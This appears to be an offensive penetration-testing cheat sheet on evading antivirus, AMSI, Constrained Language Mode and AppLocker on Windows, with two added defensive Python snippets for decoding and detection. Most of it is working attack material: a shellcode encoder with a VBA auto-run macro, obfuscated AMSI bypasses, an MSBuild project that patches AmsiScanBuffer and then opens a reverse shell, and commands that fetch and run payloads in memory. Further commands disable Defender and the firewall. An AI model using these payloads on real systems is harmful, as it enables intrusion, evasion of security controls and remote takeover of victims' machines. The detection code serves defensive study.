Bypass All The Things
Stuck? Look at this --> https://github.com/emanuelepicas/OSEP/tree/master/AV-Evasion
Encode payload with Byte Shifting
using System;
using System.Text;

namespace EncryptVBA
{
    class Program
    {
        static void Main(string[] args)
        {
            // Paste the msfvenom output here, e.g. from:
            // msfvenom -p windows/meterpreter/reverse_http LHOST=192.168.45.173 LPORT=8080 -f csharp
            byte[] buff = new byte[] { /* msfvenom -f csharp bytes go here */ };

            // Shift every byte up by 2 (mod 256); the VBA macro subtracts 2 again.
            byte[] encoded = new byte[buff.Length];
            for (int i = 0; i < buff.Length; i++)
            {
                encoded[i] = (byte)(((uint)buff[i] + 2) & 0xFF);
            }

            // Emit the bytes as a comma-separated decimal list, with a VBA
            // line continuation (" _") after every 50 values.
            uint counter = 0;
            StringBuilder hex = new StringBuilder(encoded.Length * 2);
            foreach (byte b in encoded)
            {
                hex.AppendFormat("{0:D},", b);
                counter++;
                if (counter % 50 == 0)
                {
                    hex.AppendFormat(" _{0}", Environment.NewLine);
                }
            }
            Console.WriteLine("The payload is: " + hex.ToString());
        }
    }
}
For quick compiling without Visual Studio, use csc.exe:
c:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe -out:C:\Windows\Tasks\encodepayload.exe z:\encodepayload.cs
VBA Script decode payload with Byte Shifting
Make sure every line of your shellcode array ends with " _" (space, underscore), the VBA line continuation:

Private Declare PtrSafe Function CreateThread Lib "KERNEL32" (ByVal SecurityAttributes As Long, ByVal StackSize As Long, ByVal StartFunction As LongPtr, ThreadParameter As LongPtr, ByVal CreateFlags As Long, ByRef ThreadId As Long) As LongPtr
Private Declare PtrSafe Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
Private Declare PtrSafe Function RtlMoveMemory Lib "KERNEL32" (ByVal lDestination As LongPtr, ByRef sSource As Any, ByVal lLength As Long) As LongPtr

Sub MyMacro()
    Dim buf As Variant
    Dim addr As LongPtr
    Dim counter As Long
    Dim data As Long
    Dim res As Long
    Dim i As Long

    ' Paste the encoder output here (decimal values, " _" at each line end)
    buf = Array(EncodedPayloadPasteHere)

    ' Undo the +2 byte shift applied by the encoder
    For i = 0 To UBound(buf)
        buf(i) = buf(i) - 2
    Next i

    ' Allocate memory, copy the decoded bytes in one at a time, start a thread on it
    addr = VirtualAlloc(0, UBound(buf), &H3000, &H40)
    For counter = LBound(buf) To UBound(buf)
        data = buf(counter)
        res = RtlMoveMemory(addr + counter, data, 1)
    Next counter
    res = CreateThread(0, 0, addr, 0, 0, 0)
End Sub

Sub Document_Open()
    MyMacro
End Sub

Sub AutoOpen()
    MyMacro
End Sub
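As an added example (not code from the original page), the same +2 shift in Python next to the reverse an analyst performs on a captured macro: pull the decimal values out of the `Array(...)` literal, tolerate the ` _` continuations, undo the shift and recover the original bytes. It goes beyond the page's encoder by parameterising the shift and by handling the mod-256 wrap-around explicitly; the sample bytes and the macro skeleton are constructed.

```python
import re

def shift_encode(payload: bytes, shift: int = 2, per_line: int = 50) -> str:
    """Same transform as the C# encoder: add `shift` to each byte (mod 256) and
    emit a decimal list with a VBA ' _' line continuation every `per_line` values."""
    out = []
    for i, b in enumerate(payload, start=1):
        out.append(f"{(b + shift) & 0xFF},")
        if i % per_line == 0:
            out.append(" _\n")
    return "".join(out)

def extract_vba_array(macro_src: str) -> list:
    """Pull the decimal values out of the macro's `Array(...)` literal, tolerating
    the ' _' continuations, surrounding whitespace and a trailing comma."""
    m = re.search(r"Array\(([^)]*)\)", macro_src)
    if m is None:
        raise ValueError("no Array(...) literal found in macro")
    body = m.group(1).replace("_", " ")
    return [int(v) for v in body.split(",") if v.strip()]

def shift_decode(values, shift: int = 2) -> bytes:
    """Mirror of the macro's `buf(i) = buf(i) - 2` loop, with 8-bit wrap-around."""
    return bytes((v - shift) & 0xFF for v in values)

def recover_payload(macro_src: str, shift: int = 2) -> bytes:
    """Analyst helper: macro source in, original bytes out."""
    return shift_decode(extract_vba_array(macro_src), shift)

# Constructed sample standing in for real shellcode; it includes 0xFE and 0xFF
# so the mod-256 wrap-around of the shift is exercised.
SAMPLE = bytes(range(0, 256, 3)) + b"\xfe\xff"

# A minimal macro skeleton (constructed) with the encoder output pasted in.
SAMPLE_MACRO = ("Sub MyMacro()\n    Dim buf As Variant\n    buf = Array("
                + shift_encode(SAMPLE) + ")\nEnd Sub\n")
```

A shift of two is not encryption: it only defeats a signature on the literal byte values, and anyone who reads the macro recovers the payload with the decode function above.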
AMSI Bypass

Always works:
SeT-Item ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varIABLE ( ('1Q'+'2U') +'zX' ) -VaL )."AssEmbly"."GETTYPe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."getfiElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sETVaLUE"( ${nULl},${tRuE} )
More advanced:
SET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]("{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL)."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ))."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),("{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"(${n`ULl},${t`RuE} )
Sometimes has problems with CLM:
$a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like "*Context") {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1)
[Ref].Assembly.GetType('System.Management.Automation.AmsiUt'+'ils').GetField('ams'+'iInitFailed','NonPublic,Static').SetValue($null,$true)
Or, if it doesn't work, save the PowerShell command into amsi.txt and execute it directly in memory with IEX:
(new-object system.net.webclient).downloadstring('http://192.168.x.y/amsi.txt') |IEX
Stuck with AMSI? Try this -> https://amsi.fail/
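Added example, not from the original page: a script-block-log normaliser a defender can run over PowerShell 4104 events to catch the three obfuscation styles used above (string concatenation, -f format-string reordering, backtick-split member names) before matching the usual AmsiUtils / amsiInitFailed strings. The wildcard variant never spells "amsi", so it is caught by its shape instead. The sample blocks are constructed fragments in those styles.

```python
import re

# Constructed script-block samples (as a 4104 script block log would record them) in
# the styles of the one-liners above: '+' concatenation; -f format-string reordering
# with backtick-split member names; the wildcard lookup that never spells "amsi".
SAMPLES = {
    "concat": "[Ref].Assembly.GetType('System.Management.Automation.AmsiUt'+'ils')"
              ".GetField('ams'+'iInitFailed','NonPublic,Static').SetValue($null,$true)",
    "format": "$x.\"A`ss`Embly\".\"GET`TY`Pe\"((\"{6}{3}{1}{4}{2}{0}{5}\" -f('Uti'+'l'),'A',"
              "('Am'+'si'),('.Man'+'agement.'),('u'+'tomation.'),'s',('Syst'+'em')))"
              ".\"g`etf`iElD\"((\"{0}{2}{1}\" -f('a'+'msi'),'d',('I'+'nitF'+'aile')),'NonPublic,Static')",
    "wildcard": "$a=[Ref].Assembly.GetTypes();Foreach($b in $a){if($b.Name -like \"*iUtils\")"
                "{$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d)"
                "{if($e.Name -like \"*Context\"){$f=$e}};[IntPtr]$ptr=$f.GetValue($null)",
    "benign": "Get-ChildItem -Path C:\\Windows\\Tasks | Where-Object { $_.Name -like '*.exe' }",
}

CONCAT = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")   # 'Am'+'si' -> 'Amsi'
PARENS = re.compile(r"\(\s*('[^']*')\s*\)")          # ('Amsi')  -> 'Amsi'
FORMAT = re.compile(r"\"((?:\{\d+\})+)\"\s*-f\s*((?:'[^']*'\s*,\s*)*'[^']*')")

def _apply_format(m):
    """Resolve "{1}{0}" -f 'F','rE' into 'reF' the way the -f operator would."""
    args = re.findall(r"'([^']*)'", m.group(2))
    try:
        return "'" + m.group(1).format(*args) + "'"
    except (IndexError, KeyError, ValueError):
        return m.group(0)   # argument list not fully collapsed yet; retry next pass

def normalize(script: str) -> str:
    """Strip backticks, lowercase, then collapse concatenation, parentheses and
    -f reordering to a fixed point so plain string signatures can match again."""
    s = script.replace("`", "").lower()
    prev = None
    while prev != s:
        prev = s
        s = CONCAT.sub(r"'\1\2'", s)
        s = PARENS.sub(r"\1", s)
        s = FORMAT.sub(_apply_format, s)
    return s

INDICATORS = ("amsiutils", "amsiinitfailed", "amsicontext", "amsiscanbuffer")

def is_amsi_tamper(script: str) -> bool:
    s = normalize(script)
    if any(tok in s for tok in INDICATORS):
        return True
    # Reflection into PowerShell's own assembly for non-public static fields: the
    # shape of the wildcard variant, whose text never contains "amsi" at all.
    return "[ref].assembly" in s and "nonpublic,static" in s
```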
CLM Bypass
CLM refers to Constrained Language Mode.

Using FullBypass.csproj
Make sure you have migrated to explorer or edge with meterpreter to make the shell stable (process injection also works), because the build can't run in a native reverse shell.
Check with this:
$ExecutionContext.SessionState.LanguageMode
# ConstrainedLanguage (this is bad for running a PowerShell script)
# FullLanguage (this is what we want)
Save the file as FullBypass.csproj:
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Target Name="Bypass">
<FullBypass />
</Target>
<UsingTask
TaskName="FullBypass"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll">
<Task>
<Reference Include="System.Management.Automation" />
<Code Type="Class" Language="cs">
<![CDATA[
using System;
using System.Runtime.InteropServices;
using System.Diagnostics;
using System.IO;
using Microsoft.Build.Framework;
using Microsoft.Build.Utilities;
using System.ComponentModel;
using System.Collections.Generic;
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
public class FullBypass : Task, ITask
{
[DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)]
public static extern bool VirtualProtectEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flNewProtect, out uint floldProtect);
[DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)]
public static extern bool ReadProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, int nSize, out IntPtr lpNumberOfBytesRead);
[DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)]
public static extern IntPtr OpenProcess(uint dwDesiredAccess, bool bInheritHandle, int processId);
[DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)]
public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint dwSize, out int lpNumberOfBytesWritten);
public static int BypassAMSI()
{
Console.WriteLine("Author: Shelldon");
Console.WriteLine("github: github.com/Sh3lldon");
Console.WriteLine("!!!! Please do not use in unethical hacking and follow all rules and regulations of laws!!!!");
Process[] processes = Process.GetProcessesByName("powershell");
if (processes.Length != 0)
{
Console.WriteLine("[+] Found " + processes.Length +" powershell processes\n");
}
else
{
Console.WriteLine("[-] Powershell process does not exist");
Console.WriteLine("Please create powershell process");
System.Environment.Exit(1);
}
int id = 0;
bool res = false;
for (int l = 0; l < processes.Length; l++)
{
id++;
Console.WriteLine("#" + id);
IntPtr hHandle = OpenProcess(0x001F0FFF, false, processes[l].Id);
IntPtr baseAddress = IntPtr.Zero;
IntPtr amsiScanBuffer = IntPtr.Zero;
int moduleSize = 0;
Console.WriteLine("[+] Powershell process id: " + processes[l].Id +" & handle: " + hHandle);
foreach (ProcessModule processModule in processes[l].Modules)
{
if (processModule.ModuleName == "amsi.dll")
{
Console.WriteLine("[+] Base address of amsi.dll: " + "0x" + processModule.BaseAddress.ToString("X"));
baseAddress = processModule.BaseAddress;
moduleSize = processModule.ModuleMemorySize;
Console.WriteLine("[+] Size of the module: 0x" + moduleSize.ToString("X"));
}
}
byte[] ret = new byte[32];
// First 32 bytes of AmsiScanBuffer function
byte[] fewBytes = new byte[32] { 0x4c, 0x8b, 0xdc, 0x49, 0x89, 0x5b, 0x08, 0x49, 0x89, 0x6b, 0x10, 0x49, 0x89, 0x73, 0x18, 0x57, 0x41, 0x56, 0x41, 0x57, 0x48, 0x83, 0xec, 0x70, 0x4d, 0x8b, 0xf9, 0x41, 0x8b, 0xf8, 0x48, 0x8b };
IntPtr outt;
bool addrScanBuffer = false;
int count = 0;
for (int i = 0; i <= moduleSize; i += fewBytes.Length)
{
ReadProcessMemory(hHandle, baseAddress + i, ret, fewBytes.Length, out outt);
if (addrScanBuffer == true)
{
break;
}
for (int j = 0; j < fewBytes.Length; j++)
{
if (count == fewBytes.Length - 1)
{
amsiScanBuffer = baseAddress + i;
Console.WriteLine("[+] Found AmsiScanBuffer function: 0x" + amsiScanBuffer.ToString("X"));
res = false;
addrScanBuffer = true;
break;
}
if (fewBytes[j] == ret[j])
{
count++;
}
else if (fewBytes[j] != ret[j])
{
count = 0;
break;
}
}
}
if (count != fewBytes.Length - 1)
{
Console.WriteLine("[-] Cannot find need bytes of AmsiScanBuffer function");
Console.WriteLine("Maybe you have already hijacked memory :)\n----------------------------------------------------------\n");
res = true;
}
if (res)
{
continue;
}
uint lpflOldProtect;
if (VirtualProtectEx(hHandle, baseAddress, (uint)0x1000, 0x40, out lpflOldProtect))
{
Console.WriteLine("[+] Successfully changed memory protection");
}
else
{
Console.WriteLine("[-] Changing memory protection failed");
}
byte[] hijack = new byte[3] { 0x31, 0xff, 0x90 };
int numberOfBytesWritten = 0;
if (WriteProcessMemory(hHandle, amsiScanBuffer + 0x1b, hijack, (uint)hijack.Length, out numberOfBytesWritten))
{
Console.WriteLine("[+] Successfully hijacked\n----------------------------------------------------------\n");
File.WriteAllText("C:\\Windows\\Tasks\\test.txt", "[+] Successfully hijacked\n----------------------------------------------------------\n");
}
else
{
Console.WriteLine("[-] Hijacking failed\n----------------------------------------------------------\n");
}
}
return 0;
}
public override bool Execute()
{
Runspace rs = RunspaceFactory.CreateRunspace();
rs.Open();
PowerShell ps = PowerShell.Create();
Console.WriteLine(BypassAMSI());
Console.Write("[*] Attacker IP: ");
string ip = Console.ReadLine();
Console.Write("[*] Attacker port: ");
string port = Console.ReadLine();
//Change IP and PORT
string revShellcommand = @"$client = New-Object System.Net.Sockets.TCPClient('IP',PORT);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
{
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
try
{
$sendback = (iex $data 2>&1 | Out-String );
$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
}
catch
{
$error[0].ToString() + $error[0].InvocationInfo.PositionMessage;
$sendback2 = ""ERROR: "" + $error[0].ToString() + ""`n`n"" + ""PS "" + (pwd).Path + '> ';
}
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte,0,$sendbyte.Length);
$stream.Flush();
};
$client.Close();";
revShellcommand = revShellcommand.Replace("IP", ip).Replace("PORT", port);
ps.AddScript(revShellcommand);
ps.Invoke();
rs.Close();
return true;
}
}
]]>
</Code>
</Task>
</UsingTask>
</Project>
Or download it from GitHub:
git clone https://github.com/Sh3lldon/FullBypass.git
Download this file and upload it to the Windows victim machine:
curl http://192.168.x.x/FullBypass.csproj -o C:\Windows\Tasks\FullBypass.csproj
Then run this command:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe .\FullBypass.csproj
Using Compiled C# - PowerShell Runspaces
Compile the project with Visual Studio, then convert it to base64 with certutil on Windows:
certutil -encode "\\192.168.56.106\visualstudio\AppLocker Bypass PowerShell Runspace\bin\x64\Release\AppLocker Bypass PowerShell Runspace.exe" \\192.168.56.106\visualstudio\PSRunspace-InvokeRun-certutilCoded.txt
Set up a Python simple HTTP server serving these files:
PSRunspace-InvokeRun-certutilCoded.txt
drop.ps1, with the same content as the code below:
$client = New-Object System.Net.Sockets.TCPClient('192.168.56.106',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String);$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
Then listen with nc:
sudo rlwrap nc -lvnp 443
Run this on the victim machine:
bitsadmin /Transfer theJob http://192.168.56.106:80/PSRunspace-InvokeRun-certutilCoded.txt C:\Windows\Tasks\enc.txt && certutil -decode C:\Windows\Tasks\enc.txt C:\Windows\Tasks\a.exe && C:\Windows\Microsoft.NET\Framework64\v4.0.30319\installutil.exe /logfile= /LogToConsole=false /U C:\Windows\Tasks\a.exe
Bypass AppLocker + CLM
file.txt should be base64-encoded with the Windows mechanism (certutil -encode):
bitsadmin /Transfer jobFreelance http://10.10.x.y/file.txt C:\windows\tasks\file.txt && certutil -decode C:\windows\tasks\file.txt C:\windows\tasks\bypass.exe && del C:\windows\tasks\file.txt && C:\Windows\Tasks\bypass.exe
The last command can also be swapped for another bypass mechanism, e.g. installutil.exe.
Using InstallUtil.exe
https://github.com/calebstewart/bypass-clm
Amsi + CLM Bypass
Run this with msbuild.exe (don't forget to edit the PowerShell payload first):
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe .\pwn.csproj
reference: https://www.secjuice.com/powershell-constrainted-language-mode-bypass-using-runspaces/
Run Directly in Memory
PowerShell to memory, to bypass AV:
IEX (New-Object Net.WebClient).DownloadString('http://192.168.x.x/powerview.ps1')
EXE to memory:
$data = (New-Object System.Net.WebClient).DownloadData('http://192.168.x.y/Rubeus.exe')
Load the EXE in memory:
$assemb = [System.Reflection.Assembly]::Load($data)
Call the function directly, since Main is a global (public static) function:
[Rubeus.Program]::Main("s4u /user:xxx$ /rc4:<hash> /impersonateuser:administrator /msdsspn:cifs/file_01 /ptt".Split())
Disable Windows Defender
Requires local admin and needs to be executed via impacket-psexec or psexec.exe.
impacket-psexec needs the SMB service (port 445).
"C:\Program Files\Windows Defender\MpCmdRun.exe" -removedefinitions -all
Disable Firewall
Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true
NetSh Advfirewall set allprofiles state off